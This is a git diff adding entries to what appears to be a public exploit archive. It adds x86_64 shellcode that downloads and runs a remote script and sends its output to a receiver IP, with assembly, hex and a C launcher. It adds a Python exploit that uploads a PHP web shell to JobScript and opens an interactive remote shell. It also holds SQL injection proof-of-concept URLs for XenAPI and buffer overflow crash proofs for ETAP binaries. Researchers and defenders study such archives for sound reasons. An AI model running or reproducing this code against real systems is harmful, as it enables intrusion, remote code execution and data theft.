diff --git a/files.csv b/files.csv index 19a113f76..4a07f7ae4 100755 --- a/files.csv +++ b/files.csv @@ -36029,3 +36029,8 @@ id,file,description,date,author,platform,type,port 39841,platforms/xml/webapps/39841.txt,"SAP NetWeaver AS JAVA 7.1 - 7.5 - Information Disclosure",2016-05-19,ERPScan,xml,webapps,0 39842,platforms/linux/dos/39842.txt,"4digits 1.1.4 - Local Buffer Overflow",2016-05-19,N_A,linux,dos,0 39843,platforms/windows/local/39843.c,"VirIT Explorer Lite & Pro 8.1.68 - Local Privilege Escalation",2016-05-19,"Paolo Stagno",windows,local,0 +39845,platforms/windows/local/39845.txt,"Operation Technology ETAP 14.1.0 - Local Privilege Escalation",2016-05-23,LiquidWorm,windows,local,0 +39846,platforms/windows/dos/39846.txt,"Operation Technology ETAP 14.1.0 - Multiple Stack Buffer Overrun Vulnerabilities",2016-05-23,LiquidWorm,windows,dos,0 +39847,platforms/lin_x86-64/shellcode/39847.c,"Linux x86_64 Information Stealer Shellcode",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 +39848,platforms/php/webapps/39848.py,"Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80 +39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443 diff --git a/platforms/lin_x86-64/shellcode/39847.c b/platforms/lin_x86-64/shellcode/39847.c new file mode 100755 index 000000000..936a0dbab --- /dev/null +++ b/platforms/lin_x86-64/shellcode/39847.c @@ -0,0 +1,576 @@ +/* + # Title : Linux x86_64 information stealer + # Date : 23-05-2016 + # Author : Roziul Hasan Khan Shifat + # Tested On : Ubuntu 14.04 LTS x86_64 + # Contact : shifath12@gmail.com + +*/ + + +/* + How does this shellcode works + ----------------------------------- +1. First it connects to the information reciver +2. then it download a sh script from http://192.168.30.129/pri.sh (server running on Kali linux) +3. duplicating stdout,stderr with socket descriptor +4. then it execute the script using sh + +*/ + +/* + +Note: the pri.sh file was in kali linux.the server was Kali linux +client was Ubuntu +it downloads the pri.sh from kali linux +and Executes it on Ubuntu +*/ + + + +/* + Requirements of this shellcode + -------------------------------------- +1.link of pri.sh (You can Found it on http://pastebin.com/V4gudKL5 ) . this script isn't mine.I've taken it from another.I customized the script +2.reciver ip + +*/ + + +/* + How to use this shellcode + --------------------------------- +1. Upload the pri.sh any site +2. TO download the pri.sh , U need to Customize the wget procedure (I've marked where to customized) +3. Customize the connect procedure for connect to the reciver where i marked +4. U need to know assembly to completed 1,2 instruction + +*/ + + + +/* + Reciver + --------- +To recive the Information U may Use Netcat +If U want to view the informations on Web browser , I've a php script for U. upload it any site. + + + + +if U this script , the reciver ip will be the website ip + +BUT I RECOMMEND U TO USE NETCAT + + +*/ + + + + +/* + +Disassembly of section .text: + +0000000000400080 <_start>: + 400080: 6a 06 pushq $0x6 + 400082: 6a 01 pushq $0x1 + 400084: 6a 02 pushq $0x2 + 400086: 5f pop %rdi + 400087: 5e pop %rsi + 400088: 5a pop %rdx + 400089: 6a 29 pushq $0x29 + 40008b: 58 pop %rax + 40008c: 0f 05 syscall + 40008e: 48 31 db xor %rbx,%rbx + 400091: 48 89 c3 mov %rax,%rbx + 400094: 48 31 c0 xor %rax,%rax + 400097: 48 31 ff xor %rdi,%rdi + 40009a: b0 39 mov $0x39,%al + 40009c: 0f 05 syscall + 40009e: 4d 31 c9 xor %r9,%r9 + 4000a1: 4c 39 c8 cmp %r9,%rax + 4000a4: 74 18 je 4000be + 4000a6: 6a 3c pushq $0x3c + 4000a8: 58 pop %rax + 4000a9: 0f 05 syscall + +00000000004000ab : + 4000ab: 48 31 f6 xor %rsi,%rsi + 4000ae: 48 f7 e6 mul %rsi + 4000b1: 56 push %rsi + 4000b2: 6a 3c pushq $0x3c + 4000b4: 48 89 e7 mov %rsp,%rdi + 4000b7: b0 23 mov $0x23,%al + 4000b9: 0f 05 syscall + 4000bb: eb 01 jmp 4000be + 4000bd: c3 retq + +00000000004000be : + 4000be: 6a 10 pushq $0x10 + 4000c0: 5a pop %rdx + 4000c1: 53 push %rbx + 4000c2: 5f pop %rdi + 4000c3: 48 31 c0 xor %rax,%rax + 4000c6: 50 push %rax + 4000c7: 50 push %rax + 4000c8: 50 push %rax + 4000c9: c6 04 24 02 movb $0x2,(%rsp) + 4000cd: 66 c7 44 24 02 05 fc movw $0xfc05,0x2(%rsp) + 4000d4: c7 44 24 04 c0 a8 1e movl $0x811ea8c0,0x4(%rsp) + 4000db: 81 + 4000dc: 48 89 e6 mov %rsp,%rsi + 4000df: b0 2a mov $0x2a,%al + 4000e1: 0f 05 syscall + 4000e3: 48 31 ff xor %rdi,%rdi + 4000e6: 48 39 f8 cmp %rdi,%rax + 4000e9: 7c c0 jl 4000ab + 4000eb: 48 31 c0 xor %rax,%rax + 4000ee: 48 31 f6 xor %rsi,%rsi + 4000f1: 48 ff c6 inc %rsi + 4000f4: 48 89 df mov %rbx,%rdi + 4000f7: b0 21 mov $0x21,%al + 4000f9: 0f 05 syscall + 4000fb: 48 31 c0 xor %rax,%rax + 4000fe: 48 ff c6 inc %rsi + 400101: 48 89 df mov %rbx,%rdi + 400104: b0 21 mov $0x21,%al + 400106: 0f 05 syscall + 400108: 48 31 c0 xor %rax,%rax + 40010b: 48 83 c0 39 add $0x39,%rax + 40010f: 0f 05 syscall + 400111: 48 31 ff xor %rdi,%rdi + 400114: 4d 31 e4 xor %r12,%r12 + 400117: 49 89 c4 mov %rax,%r12 + 40011a: 48 39 f8 cmp %rdi,%rax + 40011d: 74 59 je 400178 + 40011f: 4d 31 d2 xor %r10,%r10 + 400122: 48 31 d2 xor %rdx,%rdx + 400125: 4c 89 d6 mov %r10,%rsi + 400128: 4c 89 e7 mov %r12,%rdi + 40012b: 48 31 c0 xor %rax,%rax + 40012e: b0 3d mov $0x3d,%al + 400130: 0f 05 syscall + 400132: 48 31 c0 xor %rax,%rax + 400135: 48 31 d2 xor %rdx,%rdx + 400138: 50 push %rax + 400139: 50 push %rax + 40013a: c7 04 24 2f 2f 62 69 movl $0x69622f2f,(%rsp) + 400141: c7 44 24 04 6e 2f 73 movl $0x68732f6e,0x4(%rsp) + 400148: 68 + 400149: 48 89 e7 mov %rsp,%rdi + 40014c: 50 push %rax + 40014d: 50 push %rax + 40014e: c7 04 24 2e 70 72 69 movl $0x6972702e,(%rsp) + 400155: 66 c7 44 24 04 2e 73 movw $0x732e,0x4(%rsp) + 40015c: c6 44 24 06 68 movb $0x68,0x6(%rsp) + 400161: 48 89 e6 mov %rsp,%rsi + 400164: 52 push %rdx + 400165: 56 push %rsi + 400166: 57 push %rdi + 400167: 48 89 e6 mov %rsp,%rsi + 40016a: 48 83 c0 3b add $0x3b,%rax + 40016e: 0f 05 syscall + 400170: 41 51 push %r9 + 400172: 5f pop %rdi + 400173: 6a 03 pushq $0x3 + 400175: 58 pop %rax + 400176: 0f 05 syscall + +0000000000400178 : + 400178: 48 31 c0 xor %rax,%rax + 40017b: 50 push %rax + 40017c: 50 push %rax + 40017d: 50 push %rax + 40017e: c7 04 24 2f 75 73 72 movl $0x7273752f,(%rsp) + 400185: c7 44 24 04 2f 62 69 movl $0x6e69622f,0x4(%rsp) + 40018c: 6e + 40018d: c7 44 24 08 2f 2f 77 movl $0x67772f2f,0x8(%rsp) + 400194: 67 + 400195: 66 c7 44 24 0c 65 74 movw $0x7465,0xc(%rsp) + 40019c: 48 89 e7 mov %rsp,%rdi + 40019f: 50 push %rax + 4001a0: 50 push %rax + 4001a1: 50 push %rax + 4001a2: 50 push %rax + 4001a3: c7 04 24 68 74 74 70 movl $0x70747468,(%rsp) + 4001aa: c7 44 24 04 3a 2f 2f movl $0x312f2f3a,0x4(%rsp) + 4001b1: 31 + 4001b2: c7 44 24 08 39 32 2e movl $0x312e3239,0x8(%rsp) + 4001b9: 31 + 4001ba: c7 44 24 0c 36 38 2e movl $0x332e3836,0xc(%rsp) + 4001c1: 33 + 4001c2: c7 44 24 10 30 2e 31 movl $0x32312e30,0x10(%rsp) + 4001c9: 32 + 4001ca: c7 44 24 14 39 2f 70 movl $0x72702f39,0x14(%rsp) + 4001d1: 72 + 4001d2: c7 44 24 18 69 2e 73 movl $0x68732e69,0x18(%rsp) + 4001d9: 68 + 4001da: 48 89 e6 mov %rsp,%rsi + 4001dd: 48 31 d2 xor %rdx,%rdx + 4001e0: 50 push %rax + 4001e1: 66 c7 04 24 2d 4f movw $0x4f2d,(%rsp) + 4001e7: 48 89 e1 mov %rsp,%rcx + 4001ea: 50 push %rax + 4001eb: 50 push %rax + 4001ec: c7 04 24 2e 70 72 69 movl $0x6972702e,(%rsp) + 4001f3: 66 c7 44 24 04 2e 73 movw $0x732e,0x4(%rsp) + 4001fa: c6 44 24 06 68 movb $0x68,0x6(%rsp) + 4001ff: 49 89 e7 mov %rsp,%r15 + 400202: 52 push %rdx + 400203: 41 57 push %r15 + 400205: 51 push %rcx + 400206: 56 push %rsi + 400207: 57 push %rdi + 400208: 48 89 e6 mov %rsp,%rsi + 40020b: b0 3b mov $0x3b,%al + 40020d: 0f 05 syscall + + + + +*/ + + + + + +/* + + +section .text + global _start +;----------------- + + + +_start: + +;socket() +push 6 +push 1 +push 2 + +pop rdi +pop rsi +pop rdx + +push 41 +pop rax +syscall + +;------------------ + +xor rbx,rbx +mov rbx,rax ;socket descriptor + +;------------- +xor rax,rax +xor rdi,rdi + +mov al,57 +syscall + +xor r9,r9 + +cmp rax,r9 +jz connect + +push byte 60 +pop rax +syscall + + + +retry: + +xor rsi,rsi +mul rsi + +push rsi +push byte 60 ;1 min ( change it if U want ) + +mov rdi,rsp + +mov al,35 +syscall + +jmp connect +ret + + + +connect: + +;connect() +push 16 +pop rdx + +push rbx +pop rdi + +xor rax,rax +push rax +push rax +push rax + +mov [rsp],byte 2 + +;----------------------------------- +;customize these staetments +mov [rsp+2],word 0xfc05 ;port 1532 ( U may change it, As U wish ) +mov [rsp+4],dword 0x811ea8c0 ;ip of reciver (must change it) +;-------------------------------------- + + +mov rsi,rsp + +mov al,42 +syscall + +xor rdi,rdi +cmp rax,rdi +jl retry + + + + +;------------dup2(sd,1) + +xor rax,rax +xor rsi,rsi +inc rsi + +mov rdi,rbx + +mov al,33 +syscall + +;------------ + +;------------dup2(sd,2) + +xor rax,rax + +inc rsi + +mov rdi,rbx + +mov al,33 +syscall + +;------------ +;fork() + +xor rax,rax +add rax,57 +syscall + +xor rdi,rdi +xor r12,r12 + +mov r12,rax ;pid +cmp rax,rdi + +jz wget + +;--------------- +;wait4() + +xor r10,r10 ;null +xor rdx,rdx ;null +mov rsi,r10 ;status +mov rdi,r12 ;pid + +xor rax,rax +mov al,61 +syscall + + + +;; +;------------------------- + +;execve("//bin/sh",{"//bin/sh",".pri.sh",NULL},NULL); + +xor rax,rax +xor rdx,rdx +push rax +push rax + + +mov [rsp],dword '//bi' +mov [rsp+4],dword 'n/sh' + + +mov rdi,rsp + + +push rax +push rax + +mov [rsp],dword '.pri' +mov [rsp+4],word '.s' +mov [rsp+6],byte 'h' +mov rsi,rsp + +push rdx +push rsi +push rdi + +mov rsi,rsp + +add rax,59 +syscall +;-------- +;close(fd) + +push r9 +pop rdi + +push 3 +pop rax +syscall + + + + +wget: +;execve("/usr/bin//wget",{"/usr/bin//wget","http ://1 92.1 68.3 0.12 9/pr i.sh","-O",".pri.sh",NULL},NULL) + +xor rax,rax + + +push rax +push rax +push rax + +mov [rsp],dword '/usr' +mov [rsp+4],dword '/bin' +mov [rsp+8],dword '//wg' +mov [rsp+12],word 'et' + +mov rdi,rsp + +push rax +push rax +push rax +push rax + +;---------------------- +;cusmizetd these statements for the link of pri.sh +mov [rsp],dword 'http' +mov [rsp+4],dword '://1' +mov [rsp+8],dword '92.1' +mov [rsp+12],dword '68.3' +mov [rsp+16],dword '0.12' +mov [rsp+20],dword '9/pr' +mov [rsp+24],dword 'i.sh' +;------------------------ + +mov rsi,rsp +xor rdx,rdx + +push rax +mov [rsp],word '-O' +mov rcx,rsp + +push rax +push rax + +mov [rsp],dword '.pri' +mov [rsp+4],word '.s' +mov [rsp+6],byte 'h' + +mov r15,rsp + + + + + + +push rdx +push r15 +push rcx +push rsi +push rdi + +mov rsi,rsp + +mov al,59 +syscall + + +*/ + + + + + + + + + + + + + +#include +#include + + + +char shellcode[]="\x6a\x06\x6a\x01\x6a\x02\x5f\x5e\x5a\x6a\x29\x58\x0f\x05\x48\x31\xdb\x48\x89\xc3\x48\x31\xc0\x48\x31\xff\xb0\x39\x0f\x05\x4d\x31\xc9\x4c\x39\xc8\x74\x18\x6a\x3c\x58\x0f\x05\x48\x31\xf6\x48\xf7\xe6\x56\x6a\x3c\x48\x89\xe7\xb0\x23\x0f\x05\xeb\x01\xc3\x6a\x10\x5a\x53\x5f\x48\x31\xc0\x50\x50\x50\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x05\xfc\xc7\x44\x24\x04\xc0\xa8\x1e\x81\x48\x89\xe6\xb0\x2a\x0f\x05\x48\x31\xff\x48\x39\xf8\x7c\xc0\x48\x31\xc0\x48\x31\xf6\x48\xff\xc6\x48\x89\xdf\xb0\x21\x0f\x05\x48\x31\xc0\x48\xff\xc6\x48\x89\xdf\xb0\x21\x0f\x05\x48\x31\xc0\x48\x83\xc0\x39\x0f\x05\x48\x31\xff\x4d\x31\xe4\x49\x89\xc4\x48\x39\xf8\x74\x59\x4d\x31\xd2\x48\x31\xd2\x4c\x89\xd6\x4c\x89\xe7\x48\x31\xc0\xb0\x3d\x0f\x05\x48\x31\xc0\x48\x31\xd2\x50\x50\xc7\x04\x24\x2f\x2f\x62\x69\xc7\x44\x24\x04\x6e\x2f\x73\x68\x48\x89\xe7\x50\x50\xc7\x04\x24\x2e\x70\x72\x69\x66\xc7\x44\x24\x04\x2e\x73\xc6\x44\x24\x06\x68\x48\x89\xe6\x52\x56\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05\x41\x51\x5f\x6a\x03\x58\x0f\x05\x48\x31\xc0\x50\x50\x50\xc7\x04\x24\x2f\x75\x73\x72\xc7\x44\x24\x04\x2f\x62\x69\x6e\xc7\x44\x24\x08\x2f\x2f\x77\x67\x66\xc7\x44\x24\x0c\x65\x74\x48\x89\xe7\x50\x50\x50\x50\xc7\x04\x24\x68\x74\x74\x70\xc7\x44\x24\x04\x3a\x2f\x2f\x31\xc7\x44\x24\x08\x39\x32\x2e\x31\xc7\x44\x24\x0c\x36\x38\x2e\x33\xc7\x44\x24\x10\x30\x2e\x31\x32\xc7\x44\x24\x14\x39\x2f\x70\x72\xc7\x44\x24\x18\x69\x2e\x73\x68\x48\x89\xe6\x48\x31\xd2\x50\x66\xc7\x04\x24\x2d\x4f\x48\x89\xe1\x50\x50\xc7\x04\x24\x2e\x70\x72\x69\x66\xc7\x44\x24\x04\x2e\x73\xc6\x44\x24\x06\x68\x49\x89\xe7\x52\x41\x57\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05"; /* insert shellcode here */ + + +int main() +{ +printf("shellcode length %ld",( unsigned long ) strlen(shellcode)); + +( * (int(*)()) shellcode) (); + +} diff --git a/platforms/php/webapps/39848.py b/platforms/php/webapps/39848.py new file mode 100755 index 000000000..af55a13f9 --- /dev/null +++ b/platforms/php/webapps/39848.py @@ -0,0 +1,128 @@ +#!C:/Python27/python.exe -u +# +# +# JobScript Remote Code Execution Exploit +# +# +# Vendor: Jobscript +# Product web page: http://www.jobscript.in +# Affected version: Unknown +# +# Summary: JobScript is inbuilt structured website was developed in PHP and MySQL +# database. It's a complete job script for those who wants to start a professional +# job portal website like naukri.com, monster.com, clickjobs.com or any such major +# job portals. Jobscript was designed and developed with the following features like +# control panel for Employer's and also for Job Seeker's, email alerts, job search, +# online resume, payment and membership plans. +# +# Desc: JobScript suffers from an authenticated arbitrary PHP code execution. The +# vulnerability is caused due to the improper verification of uploaded files in +# '/admin-ajax.php' script thru the 'name' and 'file' POST parameters. This can +# be exploited to execute arbitrary PHP code by uploading a malicious PHP script +# file with '.php' extension (to bypass the '.htaccess' block rule) that will be +# stored in '/jobmonster/wp-content/uploads/jobmonster/' directory. +# +# Tested on: Apache 2.4.9 +# PHP 5.4.26 +# +# Vulnerability discovered by Bikramaditya 'PhoenixX' Guha +# +# Zero Science Lab - http://www.zeroscience.mk +# Macedonian Information Security Research And Development Laboratory +# +# +# Advisory ID: ZSL-2016-5322 +# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5322.php +# +# +# 31.03.2016 +# + +import itertools, mimetools, mimetypes +import cookielib, urllib, urllib2, sys +import os, time, re, requests, httplib + +from cStringIO import StringIO +from urllib2 import URLError + +global file, file1 +file = ';nonce' +file1 = '"security"' + +host = sys.argv[1] + +cj = cookielib.CookieJar() +opener2 = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) + +prelogin = opener2.open('http://'+host+'/jobmonster/member-2/') +output = prelogin.read() + +for line in output.splitlines(): + if file1 in line: + security = str(line.split("=")[4:])[3:13] + break + +print 'Login please.' + +username = raw_input('Enter username: ') +password = raw_input('Enter password: ') + +login_data = urllib.urlencode({ + 'action' : 'noo_ajax_login', + 'log' : username, + 'pwd' : password, + 'remember' : 'false', + 'security' : security, + 'redirect_to' : 'http%3A%2F%2Fcscript.in%2Fjobmonster%2Fmember-2%3Fpagename%3Dmember-2%26logged_in%3D1' + }) + +login = opener2.open('http://'+host+'/jobmonster/wp-admin/admin-ajax.php', login_data) +auth = login.read() + +if re.search(r'false', auth): + print 'Incorrect username or password' + sys.exit() +else: + print 'Authenticated' + +response = opener2.open('http://'+host+'/jobmonster/member-2/?pagename=member-2&logged_in=1') +response = opener2.open('http://'+host+'/jobmonster/post-a-resume/?action=resume_general') +output = response.read() + +for line in output.splitlines(): + if file in line: + nonce = str(line.split("=")[3:])[28:38] + +headers = {'User-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','Referer':'\'http://'+host+'/jobmonster/post-a-resume/?action=resume_general\'','Accept-Language':'en-US,en;q=0.5','Content-type':'multipart/form-data; boundary=---------------------------51402178812572','Connection':'close','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Encoding':'gzip, deflate','Content-length':'335'} + +body = """-----------------------------51402178812572 +Content-Disposition: form-data; name="name" + +RCE.php +-----------------------------51402178812572 +Content-Disposition: form-data; name="file"; filename="RCE.php" +Content-Type: application/pdf + + + +-----------------------------51402178812572--""" + +response = requests.post('http://'+host+'/jobmonster/wp-admin/admin-ajax.php?action=noo_plupload&nonce='+nonce+'', data=body, headers=headers, cookies=cj) + +raw_input() +while True: + try: + cmd = raw_input('shell@'+host+':~# ') + execute = opener2.open('http://'+host+'/jobmonster/wp-content/uploads/jobmonster/RCE.php?cmd='+urllib.quote(cmd)) + reverse = execute.read() + print reverse + + if cmd.strip() == 'exit': + break + + except Exception: + break + +sys.exit() \ No newline at end of file diff --git a/platforms/php/webapps/39849.txt b/platforms/php/webapps/39849.txt new file mode 100755 index 000000000..6a5bacd47 --- /dev/null +++ b/platforms/php/webapps/39849.txt @@ -0,0 +1,85 @@ +[RCESEC-2016-002] XenAPI v1.4.1 for XenForo Multiple Unauthenticated SQL Injections + +RCE Security Advisory +https://www.rcesecurity.com + + +1. ADVISORY INFORMATION +======================= +Product: XenAPI for XenForo +Vendor URL: github.com/Contex/XenAPI +Type: SQL Injection [CWE-89] +Date found: 2016-05-20 +Date published: 2016-05-23 +CVSSv3 Score: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) +CVE: - + + +2. CREDITS +========== +This vulnerability was discovered and researched by Julien Ahrens from +RCE Security. + + +3. VERSIONS AFFECTED +==================== +XenAPI for XenForo v1.4.1 +older versions may be affected too but were not tested. + + +4. INTRODUCTION +=============== +This Open Source REST API allows usage of several of XenForo's functions, +such as authentication, user information and many other functions! + +(from the vendor's homepage) + + +5. VULNERABILITY DETAILS +======================== +The plugin "XenAPI" for XenForo offers a REST Api with different functions +to query and edit information from the XenForo database backend. Amongst +those are "getGroup" and "getUsers", which can be called without +authentication (default) and since the application does not properly +validate and sanitize the "value" parameter, it is possible to inject +arbitrary SQL commands into the XenForo backend database. + +The following proof-of-concepts exploit each vulnerable REST action +and extract the hostname of the server: + +https://127.0.0.1/api.php?action=getUsers&value=' UNION ALL SELECT +CONCAT(IFNULL(CAST(%40%40HOSTNAME AS CHAR)%2C0x20))%2CNULL%23 + +https://127.0.0.1/api.php?action=getGroup&value=' UNION ALL SELECT +NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT(IFNULL(CAST(%40%40HOSTNAME AS +CHAR)%2C0x20))%2CNULL%23 + + +6. RISK +======= +The vulnerability allows remote attackers to read sensitive information +from the XenForo database like usernames and passwords. Since the affected +REST actions do not require an authentication hash, these vulnerabilities +can be exploited by an unauthenticated attacker. + + +7. SOLUTION +=========== +Update to the latest version v1.4.2 + + +8. REPORT TIMELINE +================== +2016-05-20: Discovery of the vulnerability +2016-05-20: Notified vendor via contact address +2016-05-20: Vendor provides update for both issues +2016-05-21: Provided update fixes the reported issues +2016-05-21: Vendor publishes update +2016-05-23: Advisory released + + +9. REFERENCES +============= +https://github.com/Contex/XenAPI/commit/00a737a1fe45ffe5c5bc6bace44631ddb73f2ecf +https://xenforo.com/community/resources/xenapi-xenforo-php-rest-api.902/update?update=19336 + diff --git a/platforms/windows/dos/39846.txt b/platforms/windows/dos/39846.txt new file mode 100755 index 000000000..9d75943c8 --- /dev/null +++ b/platforms/windows/dos/39846.txt @@ -0,0 +1,331 @@ + +Operation Technology ETAP 14.1.0 Multiple Stack Buffer Overrun Vulnerabilities + + +Vendor: Operation Technology, Inc. +Product web page: http://www.etap.com +Affected version: 14.1.0.0 + +Summary: Enterprise Software Solution for Electrical Power Systems. ETAP +is the most comprehensive electrical engineering software platform for the +design, simulation, operation, and automation of generation, transmission, +distribution, and industrial systems. As a fully integrated model-driven +enterprise solution, ETAP extends from modeling to operation to offer a +Real-Time Power Management System. + +Desc: Multiple ETAP binaries are prone to a stack-based buffer overflow +vulnerability because the application fails to handle malformed arguments. +An attacker can exploit these issues to execute arbitrary code within the +context of the application or to trigger a denial-of-service conditions. + +Tested on: Microsfot Windows 7 Professional SP1 (EN) x86_64 + Microsoft Windows 7 Ultimate SP1 (EN) x86_64 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5324 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5324.php + + +07.04.2016 + +-- + + + +Confirmed vulnerable binaries: +------------------------------ + +acsdvd.exe +ca.exe +csdvd.exe +DBExtractConsoleApp.exe +dccalc.exe +etarcgis.exe +etarcgis92.exe +etarcgis93.exe +ETArcGIS_TD.exe +ETArcGIS_TD10.exe +etcabp.exe +etcp.exe +etgrd.exe +ETPanelRep.exe +ET_CATIA.exe +et_ieee.exe +harmonic.exe +LA3PH.exe +LF3PH.exe +lffd.exe +lfgs.exe +lfle.exe +lfnr.exe +ms.exe +OCP.exe +opf.exe +OtiMongoConvert.exe +PlotCompare64.exe +ra.exe +SC3Ph.exe +scansi1p.exe +scansi3p.exe +SCGost1p.exe +sciec1p.exe +sciec3p.exe +sciectr.exe +scsource.exe +SFA.exe +so3ph.exe +stlf.exe +svc.exe +TDULF.exe +ts.exe +uc.exe + + + +PoCs: +----- +[vuln binary] [>256 bytes as arg] +=================================== + + +C:\ETAP 1410>etcp.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + +(281c.202c): Access violation - code c0000005 (!!! second chance !!!) +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\SysWOW64\ntdll.dll - +*** WARNING: Unable to verify checksum for C:\ETAP 1410\etcp.exe +*** ERROR: Module load completed but symbols could not be loaded for C:\ETAP 1410\etcp.exe +eax=00000041 ebx=00190002 ecx=0000000a edx=00000365 esi=00882966 edi=000003eb +eip=00407f38 esp=0018f660 ebp=0018f778 iopl=0 nv up ei pl nz na pe cy +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010207 +etcp+0x7f38: +00407f38 668943fe mov word ptr [ebx-2],ax ds:002b:00190000=6341 +0:000> !exchain +0018ff3c: etcp+10041 (00410041) +Invalid exception stack at 00410041 + +=================================== + + +C:\ETAP 1410>PlotCompare64.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + +Unhandled Exception: System.AccessViolationException: Attempted to read or write protected memory. This is often an indication that other memory is corrupt. + at System.String.wcslen(Char* ptr) + at System.String.CtorCharPtr(Char* ptr) + at wmain(Int32 argc, Char** argv, Char** envp) + at wmainCRTStartup() + + +(3a98.1e20): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** WARNING: Unable to verify checksum for C:\windows\assembly\NativeImages_v4.0.30319_64\mscorlib\54c5d3ee1f311718f3a2feb337c5fa29\mscorlib.ni.dll +*** ERROR: Module load completed but symbols could not be loaded for C:\windows\assembly\NativeImages_v4.0.30319_64\mscorlib\54c5d3ee1f311718f3a2feb337c5fa29\mscorlib.ni.dll +mscorlib_ni+0x48f380: +000007fe`dd6df380 0fb701 movzx eax,word ptr [rcx] ds:0045005c`003a0043=???? +0:000> d rdi +00000000`0278f558 00 65 93 dd fe 07 00 00-06 02 00 00 41 00 41 00 .e..........A.A. +00000000`0278f568 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0278f578 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0278f588 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0278f598 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0278f5a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0278f5b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0278f5c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. + +=============================== + + +C:\ETAP 1410>ra.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + +(1e5c.2f90): Access violation - code c0000005 (!!! second chance !!!) +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\SysWOW64\ntdll.dll - +*** WARNING: Unable to verify checksum for C:\ETAP 1410\ra.exe +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\ETAP 1410\ra.exe - +eax=0018f4a0 ebx=00000000 ecx=00000041 edx=00000359 esi=005c2962 edi=00000000 +eip=00408376 esp=0018f2cc ebp=0018f3f4 iopl=0 nv up ei pl nz ac pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 +ra!CFileMap::operator=+0x786: +00408376 66898c50ae040000 mov word ptr [eax+edx*2+4AEh],cx ds:002b:00190000=6341 +0:000> !exchain +0018ff3c: ra!CFileMap::GetLength+7b21 (00410041) +Invalid exception stack at 00410041 +0:000> kb +ChildEBP RetAddr Args to Child +WARNING: Stack unwind information not available. Following frames may be wrong. +0018f3f4 0040855f 00000001 0018f430 00000000 ra!CFileMap::operator=+0x786 +0018f410 00427462 f6504047 00000000 00000001 ra!CFileMap::GetLength+0x3f +0018ff48 00410041 